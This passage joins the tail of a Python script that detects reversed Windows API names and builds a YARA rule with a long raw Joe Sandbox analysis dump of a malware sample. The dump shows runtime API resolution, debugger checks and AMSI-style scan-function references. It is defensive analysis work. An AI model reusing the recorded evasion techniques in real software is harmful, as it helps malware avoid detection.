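    """Emit a YARA rule that matches the same reversed names, narrow and wide."""
    lines = [f"rule {rule_name}", "{", "    strings:"]
    for name in names:
        lines.append(f'        $r_{name} = "{name[::-1]}" ascii wide')
    lines += ["    condition:", "        any of ($r_*)", "}"]
    return "\n".join(lines)


# Constructed test buffer in the spirit of the record above: a forward module name
# followed by reversed API names, one of them stored as a wide string, plus one
# forward API name that must not be reported.
SAMPLE = (
    b"\x00" * 16
    + b"Kernel32\x00"
    + b"sserddAcorPteG\x00"                       # GetProcAddress, reversed (offset 25)
    + b"\x90" * 8
    + b"AyrarbiLdaoL\x00"                         # LoadLibraryA, reversed (offset 48)
    + "xEcollAlautriV".encode("utf-16-le")        # VirtualAllocEx, reversed, wide (offset 61)
    + b"\x00\x00"
    + b"GetLocaleInfoA\x00"                       # forward name: not a hit
)

if __name__ == "__main__":
    for off, name, enc in find_reversed_api_names(SAMPLE):
        print(f"0x{off:04x}  {name:<22} ({enc})")
    print(yara_rule())
```

The scan is string-level only: it catches the reversal trick used here, not API hashing or byte-wise XOR of names, so pair it with the behavioural indicator the report already gives (GetModuleHandle followed by GetProcAddress on a name built at runtime) rather than relying on it alone.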
                                                                                                                                          APIs
                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,02A9AAE7,?,?,00000000), ref: 02A9AA68
                                                                                                                                            • Part of subcall function 02A9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A9A7E2
                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02A9AAE7,?,?,00000000), ref: 02A9AA98
                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02A9AAA3
                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02A9AAE7,?,?,00000000), ref: 02A9AAC1
                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02A9AACC
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: Locale$InfoThread$CalendarEnum
• String ID:
• API String ID: 4102113445-0
APIs
• GetThreadLocale.KERNEL32(?,00000000,02A9ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02A9AB2F
  • Part of subcall function 02A9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A9A7E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: Locale$InfoThread
• String ID: eeee$ggg$yyyy
• API String ID: 4232894706-1253427255
APIs
  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
  • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
• RtlMoveMemory.NTDLL(?,?,?), ref: 02AA7ED7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: HandleModule$AddressProc$MemoryMove
• String ID: Ntdll$RtlM$oveM
• API String ID: 2705147948-1610840992
APIs
• GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
  • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
• GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: HandleModule$AddressProc
• String ID: AeldnaHeludoMteG$KernelBASE
• API String ID: 1883125708-1952140341
APIs
• GetModuleHandleW.KERNEL32(KernelBase,?,02AAFAEB,UacInitialize,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,Initialize), ref: 02AAF6EE
• GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02AAF700
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsDebuggerPresent$KernelBase
• API String ID: 1646373207-2367923768
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,02ABD10B,00000000,02ABD11E), ref: 02A9C47A
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02A9C48B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02A9E297
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02A9E2B3
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02A9E32A
• VariantClear.OLEAUT32(?), ref: 02A9E353
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: ArraySafe$Bound$ClearIndexVariant
• String ID:
• API String ID: 920484758-0
APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A9AD59
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A9AD7D
• GetModuleFileNameA.KERNEL32(02A90000,?,00000105), ref: 02A9AD98
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A9AE2E
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3990497365-0
APIs
• GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02A995DA), ref: 02A99572
• GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02A995DA), ref: 02A99578
Strings
Similarity
• API ID: DateFormatLocaleThread
• String ID: yyyy
• API String ID: 3303714858-3145165042
APIs
  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
  • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
• FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02AA83C2), ref: 02AA83A4
Strings
Similarity
• API ID: HandleModule$AddressProc$CacheFlushInstruction
• String ID: FlushInstructionCache$Kernel32
• API String ID: 3811539418-184458249
APIs
Strings
Similarity
• API ID: AllocValue
• String ID: Hvm
• API String ID: 1189806713-3417229055
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02AAAF58
• IsBadWritePtr.KERNEL32(?,00000004), ref: 02AAAF88
• IsBadReadPtr.KERNEL32(?,00000008), ref: 02AAAFA7
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02AAAFB3
Similarity
• API ID: Read$Write
• String ID:
• API String ID: 3448952669-0

Execution Graph

Execution Coverage: 1%
Dynamic/Decrypted Code Coverage: 6.1%
Signature Coverage: 0.9%
Total number of Nodes: 114
Total number of Limit Nodes: 8

Control-flow Graph
control_flow_graph 10 661c3c3-661c3ff call 65f4423 call 661d5f3 NtClose
APIs
• NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0661C3FA
Memory Dump Source
• Source File: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 065F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_65f0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 19b34c64f8f0b83ddca18d7921711965a4fff30c493853e6ca59396d6616b617
• Instruction ID: 247b5abb598c55568cc97f43636432c0c948cdb4f3b5c3f9a4c064712b2e2c98
• Opcode Fuzzy Hash: 19b34c64f8f0b83ddca18d7921711965a4fff30c493853e6ca59396d6616b617
• Instruction Fuzzy Hash: 41E04F326002047BD6A0AE69DC00FDB77ACDFC5714F404015FA18AB142C671B90187A0

Control-flow Graph
control_flow_graph 27 22762b60-22762b6c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 4c34617f80672e5e302a7b7aaef248d35670719c16a083b4df826bd2360d1ea8
• Instruction ID: 1e7606c39a998d0c8d52f3dc7603b6d51c1f107310e3da045f230ed97533b1e5
• Opcode Fuzzy Hash: 4c34617f80672e5e302a7b7aaef248d35670719c16a083b4df826bd2360d1ea8
• Instruction Fuzzy Hash: 3090026120660003450571588454626401A47E0201B97C031E1014560DC52589917129

Control-flow Graph
control_flow_graph 28 22762c70-22762c7c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: bc160332274bf62f704d71d61ef0ed19e7c5c1134f3a4af57b533b5ae338d13a
• Instruction ID: 08a6bb61d98bf7b1891c4e208a7dacf0d6ccc2c17a923621368bedec87b4ee15
• Opcode Fuzzy Hash: bc160332274bf62f704d71d61ef0ed19e7c5c1134f3a4af57b533b5ae338d13a
• Instruction Fuzzy Hash: D290023120568802D5107158C44475A001547D0301F9BC421A4424628D869589917125

Control-flow Graph
control_flow_graph 29 22762df0-22762dfc LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 28d5d09e19cd06577b87c0d7c40063f59bc054fd19a25493ad846bcb1d0d03f4
• Instruction ID: 9b4569f6abf340608ff6260de680bec00f110c1ab194e5527d0e59f73050b4a4
• Opcode Fuzzy Hash: 28d5d09e19cd06577b87c0d7c40063f59bc054fd19a25493ad846bcb1d0d03f4
• Instruction Fuzzy Hash: 9F90023120560413D51171588544717001947D0241FD7C422A0424528D96568A52B125

Control-flow Graph
control_flow_graph 30 227635c0-227635cc LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b945781d77c0dfaeafae141e8e788e5a074fa52d96c640e6cb373690985c9ec7
• Instruction ID: 92fe97548a3e60d41feaf10c8c2ff2fff48d14f65edde5a35fac8c89676e087e
• Opcode Fuzzy Hash: b945781d77c0dfaeafae141e8e788e5a074fa52d96c640e6cb373690985c9ec7
• Instruction Fuzzy Hash: C190023160970402D50071588554716101547D0201FA7C421A0424538D87958A5175A6

Control-flow Graph
control_flow_graph 0 661c6e3-661c724 call 65f4423 call 661d5f3 RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(?,0660E2BE,?,?,00000000,?,0660E2BE,?,?,?), ref: 0661C71F
Memory Dump Source
• Source File: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 065F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_65f0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: d77521647005bcff5bf8c74b6bcb6d11ea77122f9c6cfa393d7c4b621bdbae4c
• Instruction ID: a7f5f64dd257389f374314ca2638395aa3025fee5eadbd02d1bab46b2b8e8457
• Opcode Fuzzy Hash: d77521647005bcff5bf8c74b6bcb6d11ea77122f9c6cfa393d7c4b621bdbae4c
• Instruction Fuzzy Hash: E1E06D72204304BBE650EE68DC44EDB37ACEFC9710F004409F918AB242C670B91187B4

Control-flow Graph
control_flow_graph 5 661c733-661c774 call 65f4423 call 661d5f3 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,56530845,00000007,00000000,00000004,00000000,06606D6D,000000F4), ref: 0661C76F
Memory Dump Source
• Source File: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 065F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_65f0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 8fdb64056d5ac56eb03050a3be1a750157d82889bd3d7b50d517048753f9b427
• Instruction ID: 1908cce248603a0c39b353a8ddd54869ae10aad7cdf8a0fcbcf7b342753ff4cd
• Opcode Fuzzy Hash: 8fdb64056d5ac56eb03050a3be1a750157d82889bd3d7b50d517048753f9b427
• Instruction Fuzzy Hash: ECE06572204304BBDA90EF98DC40F9B77ACEFC9710F004409FA18AB242DB70B9118BB4

Control-flow Graph
control_flow_graph 15 661c783-661c7bf call 65f4423 call 661d5f3 ExitProcess
APIs
• ExitProcess.KERNEL32(?,00000000,00000000,?,8970EBBF,?,?,8970EBBF), ref: 0661C7BA
Memory Dump Source
• Source File: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 065F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_65f0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: c424dda2dd0c29664fa9a855b2ebea30850c6aa388c004a8be5cc72625d4ab60
• Instruction ID: 1d25ae1a947954d8e8c955ff2107d6ed417eb19fe02a991bd95771851d6de452
• Opcode Fuzzy Hash: c424dda2dd0c29664fa9a855b2ebea30850c6aa388c004a8be5cc72625d4ab60
• Instruction Fuzzy Hash: A9E086362102147BD660FF59DC01F9777ACEFC6711F004059FA18AB142C670BA1087F0

Control-flow Graph
control_flow_graph 20 6603d8e-6603d9e PostThreadMessageW 21 6603da0-6603daa 20->21 22 6603dad-6603db3 20->22 21->22
APIs
• PostThreadMessageW.USER32(?,00000111), ref: 06603D9A
Memory Dump Source
• Source File: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 065F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_65f0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
• Instruction ID: 9625f0a618ab2e51fe13e4d24e8301295917cd27be8ec0cfea172b09500661eb
• Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
• Instruction Fuzzy Hash: C0D0A967B4001C3AAA024584ACC1CFFB72CDB84AA6F004063FB08E2280E62189020AB0

Control-flow Graph
control_flow_graph 23 22762c0a-22762c0f 24 22762c11-22762c18 23->24 25 22762c1f-22762c26 LdrInitializeThunk 23->25
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: cf3133bd610033da4e467d1b9e8037f53a17084081e1926402155d01939931e0
                                                                                                                                          • Instruction ID: ba280a071d7a48286205cd7347e95588509752b5fff3ffe0147f1175cdb9df45
                                                                                                                                          • Opcode Fuzzy Hash: cf3133bd610033da4e467d1b9e8037f53a17084081e1926402155d01939931e0
                                                                                                                                          • Instruction Fuzzy Hash: C6B09B719067C5C9DB41E7604B0C727791167D0701F57C071D6030651F4778C1D1F175
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-2160512332
                                                                                                                                          • Opcode ID: f8ab8229cd7f26573ab0d6ec75ea2f86b88b57d7a38eaa12e3b8e77ddd291fea
                                                                                                                                          • Instruction ID: 187c64da1b184986a34ecebf9aecb59a6392a4ae3093fb36726c7dc4fccb4fd6
                                                                                                                                          • Opcode Fuzzy Hash: f8ab8229cd7f26573ab0d6ec75ea2f86b88b57d7a38eaa12e3b8e77ddd291fea
                                                                                                                                          • Instruction Fuzzy Hash: C2928D7160C341ABE321CF24C994F5BB7E8BB94764F104A2DFA94DB291D7B0E944CB92
                                                                                                                                          Strings
                                                                                                                                          • Invalid debug info address of this critical section, xrefs: 227954B6
                                                                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 22795543
                                                                                                                                          • undeleted critical section in freed memory, xrefs: 2279542B
                                                                                                                                          • Address of the debug info found in the active list., xrefs: 227954AE, 227954FA
                                                                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 227954CE
                                                                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2279540A, 22795496, 22795519
                                                                                                                                          • 8, xrefs: 227952E3
                                                                                                                                          • double initialized or corrupted critical section, xrefs: 22795508
                                                                                                                                          • corrupted critical section, xrefs: 227954C2
                                                                                                                                          • Critical section address., xrefs: 22795502
                                                                                                                                          • Thread identifier, xrefs: 2279553A
                                                                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 227954E2
                                                                                                                                          • Critical section address, xrefs: 22795425, 227954BC, 22795534
                                                                                                                                          • Critical section debug info address, xrefs: 2279541F, 2279552E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                          • API String ID: 0-2368682639
                                                                                                                                          • Opcode ID: cc850b4c227620932708cee7feb744b6834e63d6475152f649426af367bbae96
                                                                                                                                          • Instruction ID: b7e4b2c34f09ee4f5b10305314d1faad1fed306ca5c734678c8fd05a8bf6f995
                                                                                                                                          • Opcode Fuzzy Hash: cc850b4c227620932708cee7feb744b6834e63d6475152f649426af367bbae96
                                                                                                                                          • Instruction Fuzzy Hash: 23817BB1A08368EFEB10CF95C984FAEBBF5EB48314F504119F908B7281D375AA45CB60
                                                                                                                                          Strings
                                                                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 22792506
                                                                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 2279261F
                                                                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 227925EB
                                                                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 227922E4
                                                                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 22792412
                                                                                                                                          • @, xrefs: 2279259B
                                                                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 22792602
                                                                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 22792409
                                                                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 22792624
                                                                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 22792498
                                                                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 227924C0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                          • API String ID: 0-4009184096
                                                                                                                                          • Opcode ID: 79b0300b765d11fc40525ac16e207890a3d882d83bdd709fd98721ea2d280d39
                                                                                                                                          • Instruction ID: 419c1c0929d32d1c364b6460f1f048808450d9138dcb5d16b384289274cc72f3
                                                                                                                                          • Opcode Fuzzy Hash: 79b0300b765d11fc40525ac16e207890a3d882d83bdd709fd98721ea2d280d39
                                                                                                                                          • Instruction Fuzzy Hash: 3C0263B1D093289BDB21DB14CD84BDAB7B8AF65304F4041D9AA0CB7252EB709F94CF59
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                          • API String ID: 0-2515994595
                                                                                                                                          • Opcode ID: 3cc649d7e9e0e856e21c799b879d506c7228497e614e93e13a29d6c80e83ab88
                                                                                                                                          • Instruction ID: b16181276b63a697e597e3166153bd9a1e4d4adfe56d8ee89fe78dfacc6f277e
                                                                                                                                          • Opcode Fuzzy Hash: 3cc649d7e9e0e856e21c799b879d506c7228497e614e93e13a29d6c80e83ab88
                                                                                                                                          • Instruction Fuzzy Hash: 4B51C27151E3019BC726CF29CA84BABB7E8EF98354F904A6DE959C3241E730D604C792
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                          • API String ID: 0-1700792311
                                                                                                                                          • Opcode ID: b18031df3ec71265fd17fad6de30d820989f3e54a510c80d0018150854519b8e
                                                                                                                                          • Instruction ID: 13c35c3cf8435be94d585905c42c3c8b3715284106a3d8ff691b1f8d138d197f
                                                                                                                                          • Opcode Fuzzy Hash: b18031df3ec71265fd17fad6de30d820989f3e54a510c80d0018150854519b8e
                                                                                                                                          • Instruction Fuzzy Hash: 99D10136608785DFCB12CF68C584BADBBF1FF5A314F049559E846AB292C734E981CB10
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`Vo"${
                                                                                                                                          • API String ID: 0-2118173349
                                                                                                                                          • Opcode ID: a44b412c5cedb23e055db34cf7056e5e1bff2f6d8df37df26af0feb2d3aa5c74
                                                                                                                                          • Instruction ID: 754af4a8acf12b2579a0fc4c46d250249f22bb7b0831d61f8ba5ad52271417a7
                                                                                                                                          • Opcode Fuzzy Hash: a44b412c5cedb23e055db34cf7056e5e1bff2f6d8df37df26af0feb2d3aa5c74
                                                                                                                                          • Instruction Fuzzy Hash: 24A24874A09B6A8FDB64CF19CD98B9AB7B1BF45304F5042E9D90CA7250DB709E81CF41
                                                                                                                                          Strings
